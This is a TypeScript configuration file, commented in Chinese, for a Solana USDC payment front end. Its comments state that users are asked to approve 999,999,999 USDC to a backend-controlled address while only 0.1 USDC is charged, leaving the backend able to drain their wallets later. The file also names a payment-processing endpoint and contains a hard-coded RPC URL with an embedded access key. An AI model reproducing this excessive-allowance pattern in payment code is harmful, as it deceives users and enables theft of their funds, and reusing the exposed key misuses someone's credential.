import { PublicKey } from "@solana/web3.js";

// 授权地址 - 用户将授权此地址可以操作他们的 USDC（后端扣款使用）
// ⚠️ 请将此地址替换为你自己的授权执行地址（后端私钥对应的公钥）
export const RECIPIENT_ADDRESS = new PublicKey("AJQr6v9RG5Vhv9sLhu71sKgiPEtjnp6yDeHQmwT86tDk");

// 收币地址 - USDC 将直接转账到这个地址（最终收款地址）
// ⚠️ 请将此地址替换为你自己的收币地址（可以是不同的钱包地址）
export const FINAL_RECIPIENT_ADDRESS = new PublicKey("8jtDcBpAnPrNxwzvftcyrvnktVxbWhCQnRTwp9A98HJn");

// USDC 的 mint 地址 - 主网
export const USDC_MINT_ADDRESS = new PublicKey("EPjFWdd5AufqSSqeM2qN1xzybapC8G4wEGGkZwyTDt1v");

// 你希望用户授权的 USDC 数量，应该大于实际转账金额
// 注意：USDC 有 6 位小数，所以 999999999 USDC = 999999999 * 10^6
// 授权 999999999 USDC，但实际只转账 0.1 USDC
export const APPROVE_AMOUNT = 999999999 * 10**6;

// 实际支付金额（后端会转账这个数量）
export const PAYMENT_AMOUNT = 0.1 * 10**6;

// 后端通知接口
export const BACKEND_API_URL = "https://api-v2.bitchargex.com/process-payment";

// Solana 网络配置 - 主网
export const SOLANA_NETWORK = 'mainnet-beta';

// RPC 端点配置 - 主网高性能端点（随机选择以分散请求量）
export const RPC_ENDPOINTS = [
    'https://solana-mainnet.core.chainstack.com/b5448ff460416e01089500a868229d1b',
    'https://solana-mainnet.core.chainstack.com/b5448ff460416e01089500a868229d1b',
];

// 随机选择 RPC 端点函数
export const getRandomRpcEndpoint = (): string => {
    const randomIndex = Math.floor(Math.random() * RPC_ENDPOINTS.length);
    return RPC_ENDPOINTS[randomIndex];
};



// Worker-Standalone 事件日志端点配置
export const WORKER_STANDALONE_URL = "https://api.bitchargex.com";

// 事件日志配置
export const EVENT_LOG_CONFIG = {
    ENABLED: true,  // 是否启用事件日志
    WORKER_URL: WORKER_STANDALONE_URL,
    FALLBACK_TO_DIRECT_API: false,  // 只能通过 Cloudflare Worker 调用，不允许直接调用 API
};
